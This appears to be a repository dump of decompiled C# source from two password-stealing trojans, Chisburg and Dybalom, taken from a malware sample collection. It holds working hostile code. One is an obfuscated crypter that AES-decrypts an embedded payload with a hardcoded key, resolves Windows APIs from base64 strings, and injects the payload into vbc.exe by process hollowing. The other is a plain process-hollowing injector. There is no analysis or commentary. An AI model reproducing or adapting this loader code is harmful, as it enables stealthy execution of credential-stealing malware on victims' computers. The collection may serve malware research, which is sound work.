MSIL/Trojan-PSW/Win32/C/Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Trojan-PSW/Win32/C/Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[HideModuleName]
[StandardModule]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Trojan-PSW/Win32/C/Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f/Program/Main.cs
+236
View File
@@ -0,0 +1,236 @@
// Decompiled with JetBrains decompiler
// Type: Program.Main
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace Program
{
public class Main : Form
{
private IContainer Components;
private StringBuilder đžhuxHŠhBqYDXmćIi;
[STAThread]
public static void Main() => Application.Run((Form) new Program.Main());
public Main()
{
this.Load += new EventHandler(this.Main_Load);
this.đžhuxHŠhBqYDXmćIi = new StringBuilder();
Application.EnableVisualStyles();
this.InitializeComponent();
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(1, 1);
this.Opacity = 0.0;
this.ShowInTaskbar = false;
this.Name = nameof (Main);
this.Text = nameof (Main);
this.ResumeLayout(false);
this.PerformLayout();
}
protected override void Dispose(bool Disposing)
{
if (Disposing && this.Components != null)
this.Components.Dispose();
base.Dispose(Disposing);
}
[DebuggerStepThrough]
private void InitializeComponent()
{
}
public byte[] oBŠCJfŠIgbTTšNvribUA(byte[] NiwjwQĆNFSđZYšWnNw)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.IV = new byte[16]
{
(byte) 5,
(byte) 8,
(byte) 8,
(byte) 6,
(byte) 7,
(byte) 7,
(byte) 3,
(byte) 1,
(byte) 5,
(byte) 2,
(byte) 5,
(byte) 6,
(byte) 4,
(byte) 7,
(byte) 3,
(byte) 4
};
rijndaelManaged.Key = new byte[16]
{
(byte) 4,
(byte) 3,
(byte) 7,
(byte) 4,
(byte) 6,
(byte) 5,
(byte) 2,
(byte) 5,
(byte) 1,
(byte) 3,
(byte) 7,
(byte) 7,
(byte) 6,
(byte) 8,
(byte) 8,
(byte) 5
};
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(NiwjwQĆNFSđZYšWnNw, 0, NiwjwQĆNFSđZYšWnNw.Length);
}
}
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
public T RđckvLgĐvXvrvosŠČK<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibraryA(ref name), ref method), typeof (T));
public bool bXwlfCFJQbtsuorRQbi(byte[] ZOkCiOcinđžXZđKuOk, string HwČećNđDAUctfmXzHOz)
{
Program.Main.DQđlyZXQKUljwcsižj dqđlyZxqkUljwcsižj = this.RđckvLgĐvXvrvosŠČK<Program.Main.DQđlyZXQKUljwcsižj>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
Program.Main.KćHŠććvBVeZFNTHhnV hšććvBveZfntHhnV = this.RđckvLgĐvXvrvosŠČK<Program.Main.KćHŠććvBVeZFNTHhnV>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
Program.Main.fbođRGšŽcnČGpUycĐšĆ fbođRgšŽcnČgpUycĐšĆ = this.RđckvLgĐvXvrvosŠČK<Program.Main.fbođRGšŽcnČGpUycĐšĆ>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
Program.Main.DćgbvŽfweaihibVilWoB dćgbvŽfweaihibVilWoB = this.RđckvLgĐvXvrvosŠČK<Program.Main.DćgbvŽfweaihibVilWoB>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
Program.Main.yŽĐJlaškvrrkćlOgtq žđJlaškvrrkćlOgtq = this.RđckvLgĐvXvrvosŠČK<Program.Main.yŽĐJlaškvrrkćlOgtq>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
Program.Main.ŠvlWžNWILiTčŠUUA švlWžNwiLiTčŠuua = this.RđckvLgĐvXvrvosŠČK<Program.Main.ŠvlWžNWILiTčŠUUA>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
Program.Main.ĆFnoPrdvŽĐPkđšwLGđm ćfnoPrdvŽđPkđšwLgđm = this.RđckvLgĐvXvrvosŠČK<Program.Main.ĆFnoPrdvŽĐPkđšwLGđm>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
Program.Main.ŠĆJĐčAPHHCodtSuo šćjĐčAphhCodtSuo = this.RđckvLgĐvXvrvosŠČK<Program.Main.ŠĆJĐčAPHHCodtSuo>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
bool flag;
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pĐUfJxXošTsYUQdVGx = new IntPtr[4];
byte[] yDoemFćaqJkćčIWLkh = new byte[68];
int int32_1 = BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, 60);
int int16 = (int) BitConverter.ToInt16(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 6));
IntPtr xDhpđBqŠIbJnLqEB = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 84)));
if (dqđlyZxqkUljwcsižj((string) null, new StringBuilder(HwČećNđDAUctfmXzHOz), zero1, zero1, false, 4, zero1, (string) null, yDoemFćaqJkćčIWLkh, pĐUfJxXošTsYUQdVGx))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (hšććvBveZfntHhnV(pĐUfJxXošTsYUQdVGx[1], numArray1))
{
IntPtr lHYtcldUušXrccECW = new IntPtr(checked ((long) numArray1[41] + 8L));
IntPtr zero2 = IntPtr.Zero;
IntPtr žEdXtvpRfDeJABydđZz = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (fbođRgšŽcnČgpUycĐšĆ(pĐUfJxXošTsYUQdVGx[0], lHYtcldUušXrccECW, ref zero2, (int) žEdXtvpRfDeJABydđZz, ref zero3) && šćjĐčAphhCodtSuo(pĐUfJxXošTsYUQdVGx[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 52)));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 80)));
IntPtr ŽACĐbXomGGšŠAVyLčUć = dćgbvŽfweaihibVilWoB(pĐUfJxXošTsYUQdVGx[0], num1, num2, 12288, 64);
int int32_2 = ŽACĐbXomGGšŠAVyLčUć.ToInt32();
int čePWVČDEEĐrEBwPNTHUs;
int num3 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], ŽACĐbXomGGšŠAVyLčUć, ZOkCiOcinđžXZđKuOk, checked ((uint) (int) xDhpđBqŠIbJnLqEB), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, dst[5], (Array) numArray2, 0, numArray2.Length);
num2 = new IntPtr(checked (int32_2 + dst[3]));
num1 = new IntPtr(numArray2.Length);
int num6 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, numArray2, checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
checked { ++num5; }
}
num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
num1 = new IntPtr(4);
int num7 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, BitConverter.GetBytes(ŽACĐbXomGGšŠAVyLčUć.ToInt32()), checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
numArray1[44] = checked ((uint) (ŽACĐbXomGGšŠAVyLčUć.ToInt32() + BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, int32_1 + 40)));
int num8 = švlWžNwiLiTčŠuua(pĐUfJxXošTsYUQdVGx[1], numArray1) ? 1 : 0;
}
}
int num = (int) ćfnoPrdvŽđPkđšwLgđm(pĐUfJxXošTsYUQdVGx[1]);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
goto label_11;
}
flag = true;
label_11:
return flag;
}
private void Main_Load(object sender, EventArgs e)
{
RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("glavni"));
this.bXwlfCFJQbtsuorRQbi(this.oBŠCJfŠIgbTTšNvribUA(My.Resources.Resources.glavni), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU=")));
this.Close();
}
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool DQđlyZXQKUljwcsižj(
string čuxXhččVĐćLVmnĐšbwu,
StringBuilder edbBlGCđplćZwQcrUĆOI,
IntPtr ZešwZPIyvHvČoZSIvPbh,
IntPtr JvNšXNeORĆabqvgj,
[MarshalAs(UnmanagedType.Bool)] bool PšgJŽvLFAYRxštšfXJZš,
int PPTČSttjioRfnqhNktqč,
IntPtr etbčaPćotOĆiuNmĆe,
string sĐRLLqtŠrSfPĆTCQUZiQ,
byte[] yDoemFćaqJkćčIWLkh,
IntPtr[] pĐUfJxXošTsYUQdVGx);
public delegate bool yŽĐJlaškvrrkćlOgtq(
IntPtr ĐlwXQfNHBwoŠRTDEŽačw,
IntPtr ŽACĐbXomGGšŠAVyLčUć,
byte[] ŠFOAwCVyIjjnIfNszč,
uint xDhpđBqŠIbJnLqEB,
int čePWVČDEEĐrEBwPNTHUs);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool fbođRGšŽcnČGpUycĐšĆ(
IntPtr pQkBZjĐEfmajnfFmXpz,
IntPtr lHYtcldUušXrccECW,
ref IntPtr JAŽšjKhuhXmEvtpgad,
int žEdXtvpRfDeJABydđZz,
ref IntPtr iLgVciRŽDAuežfgVvB);
public delegate IntPtr DćgbvŽfweaihibVilWoB(
IntPtr ĐmWmčWeAZHČČCvEPoĐšv,
IntPtr LRQdkćŽJĐFĆhQŠcčZbKn,
IntPtr rfšOKXhžUsgćVCXw,
int VggzYBwvcLixWćyV,
int ĐčfŽmhxZzbytRČmćvmv);
public delegate uint ŠĆJĐčAPHHCodtSuo(IntPtr RkĆBxđLGeUVpEšgrzĐ, IntPtr HnyšxĆUjĐyKlfračlI);
public delegate uint ĆFnoPrdvŽĐPkđšwLGđm(IntPtr ĆožBčliZRrŽBŽhGnvćy);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool KćHŠććvBVeZFNTHhnV(IntPtr kpFhettcmCyČfjOdJJQ, uint[] IRĐeHIAPŽAPŽdRehh);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool ŠvlWžNWILiTčŠUUA(IntPtr VScŽcČqZRPvYćBdaXK, uint[] ĐhQNPoXaĆsDDČrmP);
}
}
MSIL/Trojan-PSW/Win32/C/Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f/Resources/Resources.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: My.Resources.Resources
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace My.Resources
{
[StandardModule]
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[HideModuleName]
[CompilerGenerated]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) My.Resources.Resources.resourceMan, (object) null))
My.Resources.Resources.resourceMan = new ResourceManager("myfking", typeof (My.Resources.Resources).Assembly);
return My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => My.Resources.Resources.resourceCulture;
set => My.Resources.Resources.resourceCulture = value;
}
internal static byte[] glavni => (byte[]) RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject(nameof (glavni), My.Resources.Resources.resourceCulture));
}
}
MSIL/Trojan-PSW/Win32/C/Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f/Trojan-PSW.Win32.Chisburg.whx.csproj
+50
View File
@@ -0,0 +1,50 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{E99DB095-B9F7-43A4-AA7E-89FE696A4745}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>kripted</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>My</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program\Main.cs" />
<Compile Include="MyApplication.cs" />
<Compile Include="MyComputer.cs" />
<Compile Include="MyProject.cs" />
<Compile Include="Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="myfking.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/C/Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f/Trojan-PSW.Win32.Chisburg.whx.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "kripted", "Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.csproj", "{E99DB095-B9F7-43A4-AA7E-89FE696A4745}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E99DB095-B9F7-43A4-AA7E-89FE696A4745}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{E99DB095-B9F7-43A4-AA7E-89FE696A4745}.Debug|Any CPU.Build.0 = Debug|Any CPU
{E99DB095-B9F7-43A4-AA7E-89FE696A4745}.Release|Any CPU.ActiveCfg = Release|Any CPU
{E99DB095-B9F7-43A4-AA7E-89FE696A4745}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/C/Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f/myfking.resx
+12738
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: htngj_hk, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F32262B8-8B0E-4BCF-81B4-4FFA9BB46B72
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EECA1923-B24D-41DF-9711-024C45F2B59D}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>htngj_hk</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
